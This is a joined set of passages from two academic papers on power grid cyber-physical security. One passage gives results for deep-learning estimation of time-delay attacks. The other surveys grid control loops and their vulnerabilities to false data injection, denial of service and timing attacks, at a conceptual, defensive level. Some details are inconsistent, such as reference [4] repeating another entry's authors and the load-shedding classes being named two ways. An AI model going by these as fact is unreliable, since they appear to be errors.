We use OpenModelica [25], a Modelica-based simulator, to run the PPCS model in Fig. 2 to generate the dataset. In the PPCS model, the power controller's feedback command is corrupted by additive zero-mean Gaussian noise acting as a disturbance to the system. The adversary delays the power controller's output signal. In the PPCS model, the power setpoint corresponds to the system load and is set to its default value unless otherwise specified. The simulation starts at $t = 0$ s and terminates at $t = 1000$ s. The attack is launched at $t = 500$ s. The delay value is a randomly generated integer between 0 s and 50 s. We record the data of each simulation as our raw data. The system can stop before the simulation ends due to a severe attack; in our dataset this happens starting from $t = 900$ s. Thus, we need to estimate the delay values before $t = 900$ s. As introduced before, the three measurements $T_P$, $P$ and $P_E$ are used as the raw input data. The default input trace range is between $t = 200$ s and $t = 800$ s. The total number of data points for the fixed power setpoint is 10,000.
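For concreteness, the following Keras sketch assembles a model with the stacked-BLSTM structure described above: three bidirectional LSTM layers with dropout, followed by an MLP head for regression. The layer widths, dropout rate, and the choice of $p$ and $q$ are assumptions made for illustration; only the overall architecture comes from the text.

```python
# A minimal Keras sketch of the stacked-BLSTM regressor described above.
import numpy as np
from tensorflow.keras import layers, models

p, q = 20, 30            # hypothetical: 20 pieces of length 30 (pq = 600 points)
n_signals = 3            # T_P, P, P_E

model = models.Sequential([
    layers.Input(shape=(p, n_signals * q)),                       # one row of (1) per step
    layers.Bidirectional(layers.LSTM(64, return_sequences=True)),
    layers.Dropout(0.2),
    layers.Bidirectional(layers.LSTM(64, return_sequences=True)),
    layers.Dropout(0.2),
    layers.Bidirectional(layers.LSTM(64)),                        # keep only the last output
    layers.Dropout(0.2),
    layers.Dense(32, activation="relu"),                          # MLP head
    layers.Dense(1),                                              # predicted delay (regression)
])
model.compile(optimizer="adam", loss="mse", metrics=["mae"])

# Dummy arrays with the right shapes: traces reshaped into the p x 3q matrix of (1).
X = np.random.rand(128, p, n_signals * q)
y = np.random.randint(0, 51, size=(128, 1)).astype("float32")
model.fit(X, y, epochs=1, batch_size=32, verbose=0)
```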
For each set of data, we use 70% for training and 30% for testing. Our LSTM networks are implemented using the Python DL library Keras [26], a high-level neural network API running on top of TensorFlow, CNTK or Theano. To evaluate the performance of the delay attack characterization approaches, we use three metrics: root mean square error (RMSE), mean absolute error (MAE) and mean absolute percentage error (MAPE), defined as

$$\mathrm{RMSE} = \sqrt{\frac{1}{n}\sum_{i=1}^{n}(\tau_i - \hat{\tau}_i)^2}, \quad \mathrm{MAE} = \frac{1}{n}\sum_{i=1}^{n}\left|\tau_i - \hat{\tau}_i\right|, \quad \mathrm{MAPE} = \frac{100\%}{n}\sum_{i=1}^{n}\left|\frac{\tau_i - \hat{\tau}_i}{\tau_i}\right|,$$

where $\tau_i$ and $\hat{\tau}_i$ are the actual and estimated delay values at the $i$th test and $n$ is the total number of tests. Note that MAPE is not computed for the zero-delay case, i.e., no attack, as the denominator cannot be zero.

B. The Benchmark Result

We first apply the simple but efficient kNN approach as our benchmark for delay attack characterization in the PPCS. kNN is a lazy learning approach: no pre-computed training model is needed. Given a labeled time-series dataset, a chosen integer $k$, and the testing data, the kNN algorithm retrieves the $k$ nearest neighbors from the training dataset and then returns their dominant label for the testing data. One critical part of the kNN algorithm is the choice of distance metric. For time-series data, the Euclidean distance is the simplest yet effective choice. The distance between two time series is

$$\mathrm{dist}(d, d') = \sqrt{\sum_{t=1}^{T}\bigl(d(t) - d'(t)\bigr)^2}, \quad (2)$$

where $d$ is the testing data, $d'$ is one of the traces in the training dataset and $T$ is the input data length. kNN is a search-based technique, so a large data space is needed to obtain accurate results. In our problem, since we have three traces for the three measurements, we concatenate them into one trace as the input to kNN for calculating the Euclidean distance in (2).

[Fig. 4: The performance of the kNN approach. (a) Impact of different values of k. (b) The correlation between prediction and actual delay.]

We show the delay characterization performance of kNN in Fig. 4. We increase the value of $k$ to observe its impact in Fig. 4(a). The metrics show that kNN works well when $k = 1$, i.e., finding only the single nearest neighbor in the training data space, where the RMSE is around 1.5 s, the MAE is 1 s and the MAPE is 14%. In Fig. 4(b), we show the correlation between the actual delay values and the predictions of the kNN approach. We see that the error is biased when the delay is short, i.e., more predictions fall below the true values. This also explains the poor MAPE performance, where a heavier penalty is imposed on negative errors. In the kNN approach, our training data space is large enough that a close neighbor can easily be found for the testing data, so the error can be small.

C. Performance of the LSTM Approach

We now show the performance of the LSTM approach, using the LSTM-based DL model introduced in Section V for learning. The result is listed in Table I. We see that LSTM achieves very good prediction performance: the MAE is as small as 0.4 s while the MAPE is only 5.5%. Moreover, Fig. 5(a) shows the performance for different delay ranges in the LSTM approach.
When the delay is short, the RMSE and MAE are very small, around 0.7 s and 0.3 s, respectively. As the delay becomes longer, the RMSE and MAE increase, but the largest MAE is still less than 1 s, which remains small relative to delay values of 30-40 s. When the delay range is small, the MAPE is somewhat high. The reason is that the prediction error is close to the true value; for example, the error may be 1 s while the true delay value is 1 s, so the MAPE becomes high by its definition. It is nevertheless still much better than the kNN approach.

TABLE I: Performance of the LSTM approach.
Metric:  RMSE (s)  MAE (s)  MAPE (%)
Result:  1.0       0.4      5.5

[Fig. 5: The performance of the LSTM approach. (a) The error under different delay ranges. (b) The correlation between prediction and actual delay.]

Fig. 5(b) shows the relationship between the predicted delay values and the true delay values. The predicted values lie much closer to the true delay values in general compared with Fig. 4(b). There can be cases where the error is large when the delay is long; the reason is that the training data volume for that delay range is small. But such large errors rarely happen.

D. Comparison of Different Approaches

We now compare the performance of the two approaches. For kNN, we choose k = 1. We show how different settings of the input traces affect the performance. We first keep increasing the trace starting point from t0 = 100 s until t0 = 250 s in the raw data while fixing the trace length at 600 s, and show the impact on the different approaches in Fig. 6(a). Next, we make the trace range cover the same length before and after the attack while increasing the range length, and show the impact in Fig. 6(b).

[Fig. 6: The impact of the input trace on different approaches. (a) Changing the trace starting point. (b) Changing the trace range.]

We see that, in general, if the input trace covers enough data after the attack, the LSTM-based DL performs well. kNN is more robust to the input trace, as it only needs to find its nearest neighbor. From the results in Fig. 6, we also see that there is a trade-off between the input trace range and the prediction performance: a longer range brings better performance, but the estimate becomes available later. Thus, in this delay attack characterization problem, the input trace length and starting point should be chosen properly to obtain a good delay prediction as early as possible.

Lastly, we use multiple power setpoints to mimic different total loads in the power system. We add another 5 power setpoints and conduct the simulations under each of them as before to generate the data. We use 17,000 data points for training and 9,000 for testing, in which 1,500 test points are generated from randomly chosen but reasonable power setpoints to test the model's robustness to load changes, i.e., power setpoints not seen in the training data. To train the model for multiple power setpoints, we modify the previous learning models. For the LSTM approach, we change the model in Fig. 3
by adding the power setpoint as an additional input to the MLP layer, alongside the features obtained from the BLSTM layers.

[Fig. 7: The performance of different approaches using multiple power setpoints.]

The performance of the different approaches under multiple power setpoints is shown in Fig. 7. We see that the kNN approach does not work well due to the limited search space for each power setpoint. Moreover, because of the random power setpoints in the test set, kNN cannot find a corresponding search space, as those data are not in the training set; this is a disadvantage of the kNN approach. The DL approach, on the other hand, has the capability to construct correlations that are not shown in the training data, i.e., for power setpoints not seen during training, and it performs well.

VII. CONCLUSION

This paper studied the time delay attack characterization in CPSes with DL techniques. We proposed an LSTM-based DL approach to estimate the command delay in the feedback control of CPSes. The proposed approach was evaluated on data generated from a PPCS. By comparing its performance with the benchmark kNN approach under different settings, we see that the LSTM-based DL works well as long as there is enough data for constructing the training model, whereas kNN works well only when there is a large data space for searching for the closest neighbor of the input data.

ACKNOWLEDGEMENT

This research was supported in part by the National Research Foundation, Prime Minister's Office, Singapore under its Campus for Research Excellence and Technological Enterprise (CREATE) programme, in part by the Energy Programme administered by the Energy Market Authority (EP award no. NRF2017EWT-EP003-061), and in part by the SUTD-ZJU IDEA programme under grant no. 201805.

REFERENCES

[1] Y. Zhang and V. Paxson, "Detecting stepping stones," in USENIX Security Symposium, 2000.
[2] S. Viswanathan, R. Tan, and D. Yau, "Exploiting power grid for accurate and secure clock synchronization," ACM Transactions on Sensor Networks (TOSN), vol. 4, no. 2, 2018.
[3] "Hackers infiltrated power grids in U.S., Spain," https://goo.gl/DUWT1o.
[4] Y. Zhang and V. Paxson, "Stuxnet worm impact on industrial cyber-physical system security," in IECON, 2011.
[5] "The VPNFilter Botnet Is Attempting a Comeback," https://bit.ly/2xH5UQI.
[6] B. Chen, S. Mashayekh, K. Butler-Purry, and D. Kundur, "Impact of cyber attacks on transient stability of smart grids with voltage support devices," in IEEE PES General Meeting, 2013.
[7] X. Cao, P. Cheng, J. Chen, S. Ge, Y. Cheng, and Y. Sun, "Cognitive radio based state estimation in cyber-physical systems," IEEE Journal on Selected Areas in Communications, vol. 32, no. 3, pp. 489-502, 2014.
[8] A. Farraj, E. Hammad, and D. Kundur, "A cyber-physical control framework for transient stability in smart grids," IEEE Trans. Smart Grid, vol. 4, no. 2, pp. 847-855, 2013.
[9] X. Lou, C. Tran, R. Tan, D. Yau, and Z. Kalbarczyk, "Assessing and mitigating impact of time delay attack: A case study for power grid frequency control," in ACM/IEEE International Conference on Cyber-Physical Systems (ICCPS), 2019.
[10] F. Pasqualetti, F. Dorfler, and F. Bullo, "Cyber-physical attacks in power networks: models, fundamental limitations and monitor design," in IEEE Conference on Decision and Control (CDC), 2011.
[11] W. Michiels and S. Niculescu, "Stability, control, and computation for time-delay systems: an eigenvalue-based approach," SIAM, 2014.
[12] A. Sargolzaei, K. Yen, and M. Abdelghani, "Preventing time-delay switch attack on load frequency control in distributed power systems," IEEE Trans. Smart Grid, vol. 7, no. 2, pp. 1176-1185, 2016.
[13] J. Inoue, Y. Yamagata, Y. Chen, C. Poskitt, and J. Sun, "Anomaly detection for a water treatment system using unsupervised machine learning," in IEEE International Conference on Data Mining Workshops (ICDMW), 2017.
[14] J. Goh, S. Adepu, M. Tan, and Z. Lee, "Anomaly detection in cyber physical systems using recurrent neural networks," in IEEE International Symposium on High Assurance Systems Engineering (HASE), 2017.
[15] C. Feng, T. Li, and D. Chana, "Multi-level anomaly detection in industrial control systems via package signatures and LSTM networks," in IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), 2017.
[16] E. Korkmaz, M. Davis, A. Dolgikh, and V. Skormin, "Detection and mitigation of time delay injection attacks on industrial control systems with PLCs," in International Conference on Applied Cryptography and Network Security (ACNS), 2017.
[17] S. Hochreiter and J. Schmidhuber, "Long short-term memory," Neural Computation, vol. 9, no. 8, pp. 1735-1780, 1997.
[18] A. Graves, A. Mohamed, and G. Hinton, "Speech recognition with deep recurrent neural networks," in IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), 2013.
[19] I. Sutskever, O. Vinyals, and Q. V. Le, "Sequence to sequence learning with neural networks," in International Conference on Neural Information Processing Systems (NIPS), 2014.
[20] Y. Bengio, P. Frasconi, and P. Simard, "The problem of learning long-term dependencies in recurrent networks," in IEEE International Conference on Neural Networks (ICNN), 1993.
[21] M. Schuster and K. Paliwal, "Bidirectional recurrent neural networks," IEEE Transactions on Signal Processing, vol. 45, no. 11, pp. 2673-2681, 1997.
[22] Z. Cui, R. Ke, and Y. Wang, "Deep bidirectional and unidirectional LSTM recurrent neural network for network-wide traffic speed prediction," arXiv preprint arXiv:1801.02143, 2018.
[23] ThermoPower, https://casella.github.io/ThermoPower/.
[24] R. Tan, H. Nguyen, E. Foo, X. Dong, D. Yau, Z. Kalbarczyk, R. Iyer, and H. Gooi, "Optimal false data injection attack against automatic generation control in power grids," in ACM/IEEE International Conference on Cyber-Physical Systems (ICCPS), 2016.
[25] OpenModelica, https://www.openmodelica.org/.
[26] F. Chollet et al., "Keras," 2015, https://keras.io.
Learning-Based Time Delay Attack Characterization for Cyber-Physical Systems
Xin Lou, Cuong Tran, David K.Y. Yau, Rui Tan, Hongwei Ng, Tom Zhengjia Fu, Marianne Winslett
Advanced Digital Sciences Center, Illinois at Singapore; Nanyang Technological University, Singapore; Singapore University of Technology and Design; University of Illinois at Urbana-Champaign, USA
CyberPhysical_System_Security_for_the_Electric_Power_Grid.pdf
The development of a trustworthy smart grid requires a deeper understanding of potential impacts resulting from successful cyber attacks. Estimating feasible attack impact requires an evaluation of the grid's dependency on its cyber infrastructure and its ability to tolerate potential failures. A further exploration of the cyber-physical relationships within the smart grid and a specific review of possible attack vectors is necessary to determine the adequacy of cybersecurity efforts. This paper highlights the significance of cyber infrastructure security in conjunction with power application security to prevent, mitigate, and tolerate cyber attacks. A layered approach is introduced to evaluating risk based on the security of both the physical power applications and the supporting cyber infrastructure. A classification is presented to highlight dependencies between the cyber-physical controls required to support the smart grid and the communication and computations that must be protected from cyber attack. The paper then presents current research efforts aimed at enhancing the smart grid's application and infrastructure security. Finally, current challenges are identified to facilitate future research efforts.
INVITED PAPER

Cyber-Physical System Security for the Electric Power Grid

Control in power systems that may be vulnerable to security attacks is discussed in this paper, as are control loop vulnerabilities, potential impact of disturbances, and several mitigations.

By Siddharth Sridhar, Student Member IEEE, Adam Hahn, Student Member IEEE, and Manimaran Govindarasu, Senior Member IEEE

KEYWORDS | Cyber-physical systems (CPS); cyber security; electric grid; smart grid; supervisory control and data acquisition (SCADA)

(Manuscript received June 29, 2011; revised August 11, 2011; accepted August 12, 2011. Date of publication October 3, 2011; date of current version December 21, 2011. This work was supported by the National Science Foundation under Grant CNS 0915945. The authors are with the Department of Electrical and Computer Engineering, Iowa State University, Ames, IA 50011 USA (e-mail: [email protected]). Digital Object Identifier: 10.1109/JPROC.2011.2165269)

I. INTRODUCTION

An increasing demand for reliable energy and numerous technological advancements have motivated the development of a smart electric grid. The smart grid will expand the current capabilities of the grid's generation, transmission, and distribution systems to provide an infrastructure capable of handling future requirements for distributed generation, renewable energy sources, electric vehicles, and the demand-side management of electricity. The U.S. Department of Energy (DOE) has identified seven properties required for the smart grid to meet future demands [1]. These requirements include attack resistance, self-healing, consumer motivation, power quality, generation and storage accommodation, enabling markets, and asset optimization.

While technologies such as phasor measurement units (PMU), wide area measurement systems, substation automation, and advanced metering infrastructures (AMI) will be deployed to help achieve these objectives, they also present an increased dependency on cyber resources which may be vulnerable to attack [2]. Recent U.S. Government Accountability Office (GAO) investigations into the grid's cyber infrastructure have questioned the adequacy of the current security posture [3]. The North American Electric Reliability Corporation (NERC) has recognized these concerns and introduced compliance requirements to enforce baseline cybersecurity efforts throughout the bulk power system [4]. Additionally, current events have shown attackers using increasingly sophisticated attacks against industrial control systems, while numerous countries have acknowledged that cyber attacks have targeted their critical infrastructures [5], [6].

A comprehensive approach to understanding security concerns within the grid must utilize cyber-physical system (CPS) interactions to appropriately quantify attack impacts [7] and evaluate the effectiveness of countermeasures. This paper highlights CPS security for the power grid as the functional composition of the following: 1) the physical
components and control applications; 2) the cyber infrastructures required to support necessary planning, operational, and market functions; 3) the correlation between cyber attacks and the resulting physical system impacts; and 4) the countermeasures to mitigate risks from cyber threats. Fig. 1 shows a CPS view of the power grid. The cyber systems, consisting of electronic field devices, communication networks, substation automation systems, and control centers, are embedded throughout the physical grid for efficient and reliable generation, transmission, and distribution of power. The control center is responsible for real-time monitoring, control, and operational decision making. Independent system operators (ISOs) perform coordination between power utilities, and dispatch commands to their control centers. Utilities that participate in power markets also interact with the ISOs to support market functions based on real-time power generation, transmission, and demand.

This paper addresses smart grid cybersecurity concerns by analyzing the coupling between the power control applications and cyber systems. The following terms are introduced to provide a common language to address these concepts throughout the paper:

- power application: the collection of operational control functions necessary to maintain stability within the physical power system;
- supporting infrastructure: the cyber infrastructure including software, hardware, and communication networks.

This division of the grid's command and control functions will be utilized to show how cybersecurity concerns can be evaluated and mitigated through future research. Attempts to enhance the current cybersecurity posture should explore the development of secure power applications with more robust control algorithms that can operate reliably in the presence of malicious inputs, while deploying a secure supporting infrastructure that limits an adversary's ability to manipulate critical cyber resources.

The paper is organized as follows. Section II introduces a risk assessment methodology which incorporates both cyber and physical characteristics to identify physical impacts from cyber attacks. Section III presents a classification detailing the power applications necessary to facilitate grid control. Each power application contains a review of the information, communication, and algorithms required to support its operation. Additionally, specific cybersecurity concerns are addressed for each application and potential physical impacts are explored. Section IV provides a review of current research efforts focusing on security enhancements for the supporting infrastructure. Finally, emerging research challenges are introduced in Section V to highlight areas requiring attention.

II. RISK ASSESSMENT METHODOLOGY

The complexity of the cyber-physical relationship can present unintuitive system dependencies. Performing accurate risk assessments requires the development of models that provide a basis for dependency analysis and quantifying resulting impacts. This association between the salient features within both the cyber and physical infrastructure will assist in the risk review and mitigation processes. This paper presents a coarse assessment methodology to illustrate the dependency between the power applications and supporting infrastructure. An overview of the methodology is presented in Fig. 2. Risk is traditionally defined as the impact times the likelihood of an event [8].
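To make that definition concrete, the toy sketch below scores a handful of hypothetical attack scenarios as impact times likelihood; the scenario names and numbers are invented for illustration and are not part of the paper's methodology.

```python
# Toy illustration of risk = impact x likelihood over hypothetical scenarios.
scenarios = {
    # name: (likelihood in [0, 1], impact, e.g., expected MW of load lost)
    "corrupted AGC measurements": (0.10, 400.0),
    "malicious feeder trip":      (0.05, 250.0),
    "compromised smart meters":   (0.20,  50.0),
}

ranked = sorted(
    ((name, p * impact) for name, (p, impact) in scenarios.items()),
    key=lambda item: item[1],
    reverse=True,
)
for name, risk in ranked:
    print(f"{name}: risk score = {risk:.1f}")
```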
Likelihood should be addressed through the infrastructure vulnerability analysis step, which addresses the supporting infrastructure's ability to limit an attacker's access to the critical control functions. Once potential vulnerabilities are discovered, the application impact analysis should be performed to determine affected grid control functions. This information should then be used to evaluate the physical system impact.

[Fig. 1. Power grid cyber-physical infrastructure.]

A. Risk Analysis

The initial step in the risk analysis process is the infrastructure vulnerability analysis. Numerous difficulties are encountered when determining cyber vulnerabilities within control system environments due to the high availability requirements and dependencies on legacy systems and protocols [9]. A comprehensive vulnerability analysis should begin with the identification of cyber assets including software, hardware, and communications protocols. Then, activities such as penetration testing and vulnerability scanning can be utilized to determine potential security concerns within the environment. Additionally, continued analysis of security advisories from vendors, system logs, and deployed intrusion detection systems should be utilized to determine additional system vulnerabilities. Common control system cyber vulnerabilities have been evaluated by the Department of Homeland Security (DHS) based on numerous technical and nontechnical assessments [10]. Table 1 identifies these vulnerabilities and categorizes whether they were found in industry software products, general misconfigurations, or within the network infrastructure. This list provides greater insight into likely attack vectors and also helps identify areas requiring additional mitigation research.

After cyber vulnerabilities have been identified, the application impact analysis step should be performed to determine possible impacts to the applications supported by the infrastructure. This analysis should leverage the classification introduced in Section III to identify the impacted set of communication and control mechanisms. Once attack impacts on the power applications have been determined, physical impact analysis should be performed to quantify impact on the power system. This analysis can be carried out using power system simulation methods to quantify steady-state and transient performances, including power flows and variations in grid stability parameters in terms of voltage, frequency, and rotor angle.

B. Risk Mitigation

Mitigation activities should attempt to minimize unacceptable risk levels. This may be performed through the deployment of a more robust supporting infrastructure or power applications, as discussed in Sections III and IV. Understanding opportunities to focus on specific or combined approaches may present novel mitigation strategies.

Numerous research efforts have addressed the cyber-physical relationship within the risk assessment process. Interdependency research by Laprie et al. focuses on analyzing escalating, cascading, and common-cause failures within the cyber-physical relationship [11]. State machines are developed to evaluate the transitions influenced by the interdomain dependencies.
This research then shows how attack-based transitions can lead to failure states. A graph-based cyber-physical model has been proposed by Kundur et al. [12]. Here graphs are analyzed to evaluate a control's influence on a physical entity. This model is used to evaluate how power generation can be impacted by failures or attacks on cyber assets. Additional research into computing likely load loss due to a successful cyber attack has been performed by Ten et al. [13], [14]. This research uses probabilistic methods based on Petri nets and attack trees to identify weaknesses in substations and control centers, which can then be used to identify load loss as a percentage of the total load within the power system.

[Table 1: Common Control System Vulnerabilities/Weaknesses]

[Fig. 2. Risk assessment methodology.]

III. POWER SYSTEM CONTROL APPLICATIONS AND SECURITY

A power system is functionally divided into generation, transmission, and distribution. In this section, we present a classification of control loops in the power system that identifies communication signals and protocols, machines/devices, computations, and control actions associated with select control loops in each functional classification. The section also sheds light on the potential impact of cyber attacks directed at these control loops on system-wide power system stability.

Control centers receive measurements from sensors that interact with field devices (transmission lines, transformers, etc.). The algorithms running in the control center process these measurements to make operational decisions. The decisions are then transmitted to actuators to implement these changes on field devices. Fig. 3 shows a generic control loop that represents this interaction between the control center and the physical system. The measurements from sensors and the control messages from the control center are represented by y_i(t) and u_i(t), respectively. In the power system, the measured physical parameters y_i(t) may refer to quantities such as voltage and power. These measurements from substations, transmission lines, and other machines are sent to the control center using dedicated communication protocols. The measurements are then processed by a set of computational algorithms, collectively known as the energy management system (EMS), running at the control center. The decision variables u_i(t) are then transmitted to actuators associated with field devices.

An adversary could exploit vulnerabilities along the communication links and create attack templates designed either to corrupt the content of these control/measurement signals (e.g., integrity attacks), or to introduce a time delay or denial in their communication (e.g., denial of service (DoS), desynchronization, timing attacks) [15]. It is important to study and analyze impacts of such attacks on the power system as they could severely affect its security and reliability. These impacts can be measured in terms of loss of load or violations in system operating frequency and voltage and their secondary impacts. Attack studies will also help develop countermeasures that can prevent attacks or mitigate the impact from attacks.
Countermeasures include bad data detection techniques and attack-resilient control algorithms.

This section presents a classification of prominent control loops under generation, transmission, and distribution. Traditional supervisory control and data acquisition (SCADA), local, and emerging smart grid controls have been identified. For each control loop, known vulnerabilities, attack templates, and potential research directions have also been highlighted.

[Fig. 3. A typical power system control loop.]

A. Generation Control and Security

The control loops under generation primarily involve controlling the generator power output and terminal voltage. Generation is controlled by both local (automatic voltage regulator and governor control) and wide-area (automatic generation control) control schemes, as explained in this section. Fig. 4 identifies the various parameters associated with the control loops in the generation system.

[Fig. 4. Generation control classification.]

1) Automatic Voltage Regulator (AVR): Generator exciter control is used to improve power system stability by controlling the amount of reactive power being absorbed or injected into the system [16]. Digital control equipment for the exciter enables testing of different algorithms for system stability improvement. Hence, this cost-effective approach is widely preferred and used by generation utilities.

The digital exciter control module is connected to the plant control center via Ethernet and communicates using protocols such as Modbus [17]. This Ethernet link is used to program the controller with voltage setpoint values. The AVR control loop receives generator voltage feedback from the terminal and compares it with the voltage setpoint stored in memory. Based on the difference between the observed measurement and the setpoint, the current through the exciter is modified to maintain voltage at the desired level.

2) Governor Control: Governor control is the primary frequency control mechanism. This mechanism employs a sensor that detects changes in speed that accompany disturbances and accordingly alters settings on the steam valve to change the power output from the generator. The controllers used in modern digital governor control modules make use of the Modbus protocol to communicate with computers in the control center via Ethernet [18]. As in the case of the AVR, this communication link is used to define the operating setpoint for control over the governor.

a) Cyber vulnerabilities and solutions: The AVR and the governor control are local control loops. They do not depend on the SCADA telemetry infrastructure for their operations, as both the terminal voltage and rotor speed are sensed locally. Hence, the attack surface for these control loops is limited. Having said that, these applications are still vulnerable to malware that could enter the substation LAN through other entry points such as USB keys. Also, the digital control modules in both control schemes do possess communication links to the plant control center. To target these control loops, an adversary could compromise plant cybersecurity mechanisms and gain an entry point into the local area network.
Once this intrusion is achieved, an adversary can disrupt normal operation by corrupting the logic or settings in the digital control boards. Hence, security measures that validate control commands that originate even within the control center have to be implemented.

3) Automatic Generation Control: The automatic generation control (AGC) loop is a secondary frequency control loop that is concerned with fine tuning the system frequency to its nominal value. The function of the AGC loop is to make corrections to interarea tie-line flow and frequency deviation. The AGC ensures that each balancing authority area compensates for its own load change and that the power exchange between two control areas is limited to the scheduled value. The algorithm correlates frequency deviation and the net tie-line flow measurements to determine the area control error, the correction that is sent to each generating station to adjust operating points once every five seconds. Through this signal, the AGC ensures that each balancing authority area meets its own load changes and the actual power exchanged remains as close as possible to the scheduled exchange.

a) Cyber vulnerabilities and solutions: The automatic generation control relies on tie-line and frequency measurements provided by the SCADA telemetry system. An attack on AGC could have direct impacts on system frequency, stability, and economic operation. DoS types of attacks might not have a significant impact on AGC operation unless supplemented with another attack that requires AGC operation. The following research efforts have identified the impact of data corruption and intrusion on the AGC loop.

Esfahani et al. [19] propose a technique using reachability analysis to gauge the impact of an intrusion attack on the AGC loop. In [20], Sridhar and Manimaran develop an attack template that appropriately modifies the frequency and tie-line flow measurements to drive the system frequency to abnormal operating values. Areas of future research include: 1) evaluating impacts of DoS attacks on the AGC loop in combination with other attacks that trigger AGC operation; and 2) development of domain-specific bad data detection techniques for AGC to identify data integrity attacks.

B. Transmission Control and Security

The transmission system normally operates at voltages in excess of 13 kV, and the components controlled include switching and reactive power support devices. It is the responsibility of the operator to ensure that the power flowing through the lines is within safe operating margins and the correct voltage is maintained. The following control loops assist the operator in this functionality. Fig. 5 summarizes the communication protocols and other parameters associated with the control loops in the transmission system.

[Fig. 5. Transmission control classification.]

1) State Estimation: Power system state estimation is a technique by which estimates of system variables such as voltage magnitude and phase angle (state variables) are made based on presumed faulty measurements from field devices.
The process provides an estimate of state variables not just when field devices provide imperfect measurements, but also when the control center fails to receive measurements due to device or communication channel malfunction. This gives the operator details on power flows and voltage magnitudes along different sections of the transmission network and hence assists in making operational decisions. The control center performs computations using thousands of measurements it receives through the wide-area network. A good amount of work has been done in developing techniques to detect bad data in state estimation [21]-[26]. These techniques provide good estimates of state variables despite errors introduced by device and channel imperfections. However, they were not designed to be fault tolerant when malicious data are injected with intent.

a) Cyber vulnerabilities and solutions: Bad data detection in state estimation is well researched. However, these techniques were developed for errors in data that appear due to communication channel or device malfunctioning. When an adversary launches an attack directed at disrupting the smooth functioning of state estimation, these techniques might not be able to detect the presence of malicious data.

Liu et al. created a class of attacks, called false data injection attacks, that escape detection by existing bad measurement identification algorithms, provided the attackers have knowledge of the system configuration [27]. It was determined that to inject false data into a single state variable in the IEEE 300-bus system, it was sufficient to compromise ten meters. In [28], Kosut et al. verify that the impact from the false data injection attack discussed in [27] is the same as removing the attacked meters from the network. The authors also propose a graph-theoretic approach to determine the smallest set of meters that have to be compromised to make the power network unobservable. Bobba et al. [29] developed a technique to detect false data injection attacks. The idea was to observe a subset of measurements and perform calculations based on them to detect malicious data. Xie et al. show that a successful attack on state estimation could be used in the electricity markets to make financial gains [30]. As settlements between utilities are calculated based on values from state estimation, the authors show that a profit of $8/MWh can be made by tampering with meters that provide line flow information.

2) VAR Compensation: Volt-ampere reactive (VAR) compensation is the process of controlling reactive power injection or absorption in a power system to improve the performance of the transmission system. The primary aim of such devices is to provide voltage support, that is, to minimize voltage fluctuation at a given end of a transmission line. These devices can also increase the power transferable through a given transmission line and have the potential to help avoid blackout situations. Synchronous condensers and mechanically switchable capacitors and inductors were the conventional VAR compensation devices. However, with recent advancements in thyristor-based controllers, devices such as the ones belonging to the flexible AC transmission systems (FACTS) family are gaining popularity.

FACTS devices interact with one another to exchange operational information [31]. Though these devices function autonomously, they depend on communication with other FACTS devices for information to determine their operating point.
a) Cyber vulnerabilities and solutions: In [32], the authors provide a list of attack vectors that could be used against cooperating FACTS devices (CFDs). Though attacks such as denial of service and data injection are well studied and understood in the traditional IT environment, the authors provide insight into what these attacks mean in a CFD environment.

1) Denial of cooperative operation: This is a DoS attack. In this type of attack, the communication to some or all of the FACTS devices could be jammed by flooding the network with spurious packets. This will result in the loss of critical information exchange and thus affect long-term and dynamic control capabilities.

2) Desynchronization (timing-based attacks): The control algorithms employed by CFDs are time dependent and require strict synchronization. An attack of this kind could disrupt steady operation of CFDs.

3) Data injection attacks: This type of attack requires an understanding of the communication protocol. The attack could be used to send incorrect operational data such as status and control information. This may result in unnecessary VAR compensation and in unstable operating conditions. Attack templates of this type were implemented on the IEEE 9-bus system and the results are presented in [33].

3) Wide-Area Monitoring Systems: PMU-based wide-area measurement systems are currently being installed in the United States and other parts of the world. The phase angles of voltage phasors measured by PMUs directly help in the computation of real power flows in the network, and could thus assist in decision making at the control center. PMU-based control applications are yet to be used for real-time control. However, Phadke and Thorp [34] identify control applications that could be enhanced by using data provided by PMUs. It is suggested that HVDC systems, centralized excitation systems, FACTS controllers, and power system stabilizers could benefit from wide-area PMU measurements.

PMUs use global positioning system (GPS) technology to accurately timestamp phasor measurements. Thus, the phase difference between voltages on either end of a transmission line, at a given instant, can be accurately measured by using this technology. Phasor data concentrators combine data from multiple PMUs and provide a time-aligned data set for a particular region to the control center. The North American SynchroPhasor Initiative (NASPInet) [35] effort aims to develop a wide-area communications infrastructure to support this PMU operation. It is recognized that PMU-based control applications will be operational within the next five years. Hence, a secure and dependable WAN backbone becomes critical to power system stability.

C. Distribution Control and Security

The distribution system is responsible for delivering power to the customer. With the emergence of the smart grid, additional control loops that enable direct control of load at the end user level are becoming common. This section identifies key controls that help achieve this. Fig. 6 identifies communication protocols and other parameters for key control loops in the distribution system.

1) Load Shedding: Load shedding schemes are useful in preventing a system collapse during emergency operating conditions.
These schemes can be classified into proactive, reactive, and manual. Active and proactive schemes are automatic load shedding schemes that operate with the help of relays. For example, in cases where the system generation is insufficient to match the load, automatic load shedding schemes could be employed to maintain system frequency within safe operating limits and protect the equipment connected to the system. When the need arises, load is shed by a utility at the distribution level by the under-frequency relays connected to the distribution feeder.

a) Cyber vulnerabilities and solutions: Modern relays are Internet protocol (IP) ready and support communication protocols such as IEC 61850. An attack on the relay communication infrastructure or a malicious change to the control logic could result in unscheduled tripping of distribution feeders, leaving load segments unserved. The outage that occurred in Tempe, AZ, in 2007 is an example of how an improperly configured load-shedding program can result in large-scale load shedding [36]. The distribution load-shedding program of the Salt River Project was unexpectedly activated, resulting in the opening of 141 breakers and a loss of 399 MW. The outage lasted 46 min and affected 98,700 customers. Though the incident occurred due to poor configuration management by the employees, it goes on to show the impact an adversary can cause if a substation is successfully intruded.

